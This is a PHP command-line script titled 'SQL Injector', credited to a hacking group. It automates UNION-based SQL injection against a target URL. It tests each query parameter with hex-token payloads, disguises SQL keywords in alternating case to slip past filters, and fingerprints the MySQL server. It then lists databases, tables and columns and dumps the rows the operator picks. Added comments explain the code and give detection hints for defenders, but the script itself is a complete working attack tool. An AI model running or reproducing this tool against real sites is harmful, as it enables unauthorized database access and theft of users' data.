jesobreira

SQL Injector

  1. <?php
  2. /*
  3.   WhiteCollarGroup
  4.   tinyurl.com/WCollarGroup
  5.  
  6.   Coded by 0KaL @0KaL_H4
  7. */
  8.  
error_reporting(0);                      // silences every notice/warning, including the undefined-index ones below
set_time_limit(0);
ini_set("default_socket_timeout", 30);
$debug = true;

// Random marker the tool looks for in responses; hex() renders it as a MySQL
// hex literal (0x...) so it can be selected without any quoting.
$token = "wc_".uniqid();
$token_hex = hex($token);

// Target URL: first CLI argument, or prompted for on STDIN when none is given.
if($argc<2) {
  show("Enter full target URL.", "?");
  $target = gets();
} else {
  $target = $argv[1];
}

// first tests
// Pre-flight: syntactically valid URL, a query string to work with, and a
// reachable host. A response body that is empty or "0" also fails the last check.
show("Checking if URL is stable...");
if(!filter_var($target, FILTER_VALIDATE_URL)) die("Invalid URL.\n");
$target_data = parse_url($target);
if(!$target_data['query']) die("No arguments/query data was found on this URL.\n");
if(!file_get_contents($target)) die("Could not connect to the specified URL.\n");

// For every query parameter, re-sends the request with that parameter's value
// replaced by "-<value>" plus a UNION ALL SELECT of ($i+1) copies of the hex
// token, for $i = 0..8 and three quoting variants (none, single, double); the
// other parameters keep their original values via parameters(). The token
// showing up in the response means a selected column was rendered into the
// page, and the matching prefix plus column index are kept for getdata().
// Detection note: server-side this is a burst of up to 27 requests per
// parameter whose value starts with "-" and carries mixed-case UNION/SELECT
// (see request()); case-insensitive keyword matching and parameterised
// queries on the application side are the relevant controls.
$parameters = convertUrlQuery($target_data['query']);
$payload = null;
foreach($parameters as $par=>$value) {
  show("Testing \"$par\" parameter...");
  for($i = 0; $i <= 8; $i++) {
    $numbers = array();
    for($j = 0; $j <= $i; $j++) {
      $numbers[] = $token_hex;
    }
    $numbers = implode(",", $numbers);
    $get = request(parameters($par)."&$par=-$value+UNION+ALL+SELECT+$numbers--+");
    if(preg_match("/$token/", $get)) {
      $payload = parameters($par)."&$par=-$value+";
      $payload_amount = $i;          // zero-based: the column count is $i + 1
      break 2;                       // leaves both the for and the foreach
    } else {
      $get = request(parameters($par)."&$par=-$value'+UNION+ALL+SELECT $numbers--+");
      if(preg_match("/$token/", $get)) {
        $payload = parameters($par)."&$par=-$value'+";
        $payload_amount = $i;
        break 2;
      } else {
        $get = request(parameters($par)."&$par=-$value\"+UNION+ALL+SELECT+$numbers--+");
        if(preg_match("/$token/", $get)) {
          $payload = parameters($par)."&$par=-$value\"+";
          $payload_amount = $i;
          break 2;
        }
      }
    }
  }
}

if($payload) {
  show("Payload found.", ".");
  show("Selected columns: ".((string)$payload_amount+1), "i");   // the (string) cast is undone by the + 1
} else {
  die("No vulnerable parameters.\n");
}

// Server fingerprint through getdata(). (int) on a "5.x.y" style string
// yields the major version, which is what the < 5 check compares.
show("Getting server data...");
$version = getdata("version()");
show("MySQL version: $version", "i");
$user = getdata("user()");
show("MySQL user: $user", "i");
$currentdb = getdata("database()");
show("Current database: $currentdb", "i");
if((int)$version<5) {
  show("Sorry. This server is vulnerable, but this app can only hack 5 or newer MySQL versions.");
  exit;
}

// Lists schema names one row at a time (LIMIT $i,1) until getdata() returns false.
show("Getting MySQL databases...");
$i = 0;
while(true) {
  $db = getdata("(SELECT schema_name FROM information_schema.schemata LIMIT $i,1)");
  if(!$db) break;
  show("Database: ".$db, ">");
  $i++;
}

show("Enter the name of the database you want to read.", "?");
$db2get = gets();

// Same one-row-per-request listing for tables; the user-supplied name goes
// through hex() so it appears as an unquoted hex literal.
show("Getting tables...");
$i = 0;
while(true) {
  $db = getdata("(SELECT table_name FROM information_schema.tables WHERE table_schema=".hex($db2get)." LIMIT $i,1)");
  if(!$db) break;
  show("Table: ".$db, ">");
  $i++;
}

show("Enter the name of the table you want to read.", "?");
$tbl2get = gets();
show("Getting columns...");
$i = 0;
while(true) {
  $db = getdata("(SELECT column_name FROM information_schema.columns WHERE table_name=".hex($tbl2get)." AND table_schema=".hex($db2get)." LIMIT $i,1)");
  if(!$db) break;
  show("Column: ".$db, ">");
  $i++;
}

// Row dump: the column, database and table names typed by the user are
// interpolated verbatim (not hex-encoded) into the sub-select.
show("Enter the name of the columns you want to read, separated by comma (\",\").", "?");
$clm2get = gets();
$clm2get = explode(",", $clm2get);
$i = 0;
while(true) {
  show("Line $i", ">");
  foreach($clm2get as $clm) {
    $get = getdata("(SELECT $clm FROM $db2get.$tbl2get LIMIT $i,1)");
    if(!$get) break;                 // NOTE: exits only the foreach; the enclosing while(true) has no exit of its own
    show($clm."= ".$get, ">");
  }
  echo "\n";
  $i++;
}

echo "Done.\n";                      // only reached if the loop above is left some other way (exit/kill)
  131.  
  132. // lib
  133.  
  134. function gets() {
  135.     return trim(fgets(STDIN));
  136. }
  137.  
  138. function hex($string){
  139.     $hex=''; // PHP 'Dim' =]
  140.     for ($i=0; $i < strlen($string); $i++){
  141.         $hex .= dechex(ord($string[$i]));
  142.     }
  143.     return '0x'.$hex;
  144. }
  145.  
  146. function convertUrlQuery($query) {
  147.     $queryParts = explode('&', $query);
  148.    
  149.     $params = array();
  150.     foreach ($queryParts as $param) {
  151.         $item = explode('=', $param);
  152.         $params[$item[0]] = $item[1];
  153.     }
  154.    
  155.     return $params;
  156. }
  157.  
  158. function show($msg, $ico="*") {
  159.   echo "[".$ico."] ".$msg."\n";
  160. }
  161.  
function request($data) {
  // Sends one probe and returns the response body (false/empty on failure).
  // $data is a pre-built query string (parameters() output plus the injected
  // parameter); it is appended to the target URL with its original query cut
  // out. Reads the $target/$target_data globals set by the main script.
  global $target,$target_data;
  $tg = str_replace($target_data['query'], null, $target);   // URL minus query; the "?" stays (null replacement is deprecated since PHP 8.1, acts as "")
  // SQL keywords are rewritten in alternating case (see upperlower()) before
  // sending; the replacement itself is case-sensitive.
  // Detection note: signature rules that match these keywords case-sensitively
  // do not see this traffic; match case-insensitively or normalise case first.
  $words = array("UNION", "SELECT", "ALL", "concat", "information_schema", "tables", "columns", "schemata", "table_name", "column_name", "schema_name", "FROM", "LIMIT", "ORDER", "WHERE");
  foreach($words as $word) {
    $data = str_replace($word, upperlower($word), $data);
  }
  // Final URL assembly: "?&" collapses to "?", "+" and spaces become %20,
  // both quote characters are percent-encoded.
  $url = str_replace(array(
    "?&",
    "+",
    "'",
    '"',
    " "
  ), array(
    "?",
    "%20",
    urlencode("'"),
    urlencode('"'),
    "%20"
  ), $tg.$data);
  $read = file_get_contents($url);
  if(!$read) $read = file_get_contents($url);   // one retry on a failed or empty fetch
  return $read;
}
  186.  
function getdata($data) {
  // Evaluates one SQL expression on the target through the payload found by
  // the main script and returns its value as a string, or false when the
  // token delimiters are not found in the response.
  // $data: SQL expression or parenthesised sub-select, built by the caller
  // and interpolated verbatim.
  global $target,$target_data,$payload,$payload_amount,$token,$token_hex;
  // One selected column per position found during detection ($payload_amount
  // is zero-based), each wrapping the expression in the token on both sides so
  // it can be located in the page regardless of which column is rendered.
  // Detection note: "unhex(hex(concat(0x" in a request parameter is a very
  // specific pattern for this tool.
  $gtdata = array();
  for($i = 0; $i <= $payload_amount; $i++) {
    $gtdata[] = "unhex(hex(concat($token_hex, ($data), $token_hex)))";
  }
  $gtdata = implode(",", $gtdata);
  $get = request($payload."UNION+ALL+SELECT+$gtdata+LIMIT 0,1--+");
  $results = array();
  // First token-delimited capture on a single line (no "s" modifier, so "."
  // does not cross newlines).
  preg_match_all("/$token(.*)$token/", $get, $results);
  if(isset($results[1][0])) return $results[1][0];
  else return false;
}
  200.  
  201. function parameters($exception) {
  202.   global $parameters;
  203.   $pars = $parameters;
  204.   unset($pars[$exception]);
  205.   return http_build_query($pars);
  206. }
  207.  
  208. function upperlower($str) {
  209.   $j = strlen($str)-1;
  210.   $newstr = null;
  211.   for($i = 0; $i <= $j; $i++) {
  212.     if($i % 2 == 0) {
  213.       $newstr .= strtoupper($str[$i]);
  214.     } else {
  215.       $newstr .= strtolower($str[$i]);
  216.     }
  217.   }
  218.   return $newstr;
  219. }
  220.  
  221. function debug($msg) {
  222.   global $debug;
  223.   if($debug) show($msg, "D");
  224. }